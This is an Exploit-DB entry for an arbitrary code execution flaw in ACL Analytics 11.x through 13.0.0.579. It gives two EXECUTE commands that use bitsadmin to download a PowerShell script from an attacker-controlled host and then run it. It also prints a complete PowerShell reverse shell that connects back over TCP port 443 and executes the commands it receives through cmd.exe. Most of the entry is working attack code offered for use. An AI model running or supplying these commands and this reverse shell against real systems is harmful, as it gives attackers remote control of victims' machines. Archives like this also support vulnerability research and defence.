ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution

EDB-ID: 44281
Author: Clutchisback1
Published: 2018-03-12
CVE: N/A
Type: Webapps
Platform: Windows
Vulnerable App: N/A

 # Google Dork: N/A 
 # Date: 03-07-2018 
 # Exploit Author: Clutchisback1 
 # Vendor Homepage: https://www.acl.com 
 # Software Link: https://www.acl.com/products/acl-analytics/ 
 # Version: 11.x - 13.0.0.579 
 # Tested on: Windows 7 pro SP1 x86 
  
 ######################################################################### 
 #                     
 #                 
 #   Clutchisback1 /\/\/\ I'll get OSCP one day! /\/\/\ 
 #   Welcome to A_C_SHELLLLLL!!  
 #   All Glory to Yeshua 
 #   Shoutouts to my Menotor: Ch33z_plz for teaching me everyday 
 #   and my Offsec Mentor: T0w3ntum introducing me to netsec! 
 #   (I have consent for those mentions :D) 
 #                 
 #                  
 ######################################################################### 
  
  
 EXECUTE 'bitsadmin /transfer myDownloadJob /download /priority high http://127.0.0.1/shell.ps1 c:\temp\shell.ps1' 
  
  
 EXECUTE "powershell C:\temp\shell.ps1" 
  
 Description/Usage: 
 Please use the script below to create a reverse shell payload that will be downloaded form your attacking machine and uploaded to the target host by bitsadmin and placed in the target c:\temp directory and saved as shell.ps1. 
 The second `Execute` command will execute the stored payload 
  
  
 Powershell Reverse Shell was downloaded from here: https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5 
  
 $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443); 
 if($socket -eq $null){exit 1} 
 $stream = $socket.GetStream(); 
 $writer = new-object System.IO.StreamWriter($stream); 
 $buffer = new-object System.Byte[] 1024; 
 $encoding = new-object System.Text.AsciiEncoding; 
 do 
 { 
  $writer.Flush(); 
  $read = $null; 
  $res = "" 
  while($stream.DataAvailable -or $read -eq $null) { 
   $read = $stream.Read($buffer, 0, 1024) 
  } 
  $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n",""); 
  if(!$out.equals("exit")){ 
   $args = ""; 
   if($out.IndexOf(' ') -gt -1){ 
    $args = $out.substring($out.IndexOf(' ')+1); 
    $out = $out.substring(0,$out.IndexOf(' ')); 
    if($args.split(' ').length -gt 1){ 
                 $pinfo = New-Object System.Diagnostics.ProcessStartInfo 
                 $pinfo.FileName = "cmd.exe" 
                 $pinfo.RedirectStandardError = $true 
                 $pinfo.RedirectStandardOutput = $true 
                 $pinfo.UseShellExecute = $false 
                 $pinfo.Arguments = "/c $out $args" 
                 $p = New-Object System.Diagnostics.Process 
                 $p.StartInfo = $pinfo 
                 $p.Start() | Out-Null 
                 $p.WaitForExit() 
                 $stdout = $p.StandardOutput.ReadToEnd() 
                 $stderr = $p.StandardError.ReadToEnd() 
                 if ($p.ExitCode -ne 0) { 
                     $res = $stderr 
                 } else { 
                     $res = $stdout 
                 } 
    } 
    else{ 
     $res = (&"$out" "$args") | out-string; 
    } 
   } 
   else{ 
    $res = (&"$out") | out-string; 
   } 
   if($res -ne $null){ 
         $writer.WriteLine($res) 
     } 
  } 
 }While (!$out.equals("exit")) 
 $writer.close(); 
 $socket.close(); 
 $stream.Dispose() 
 END

Source: www.exploit-db.com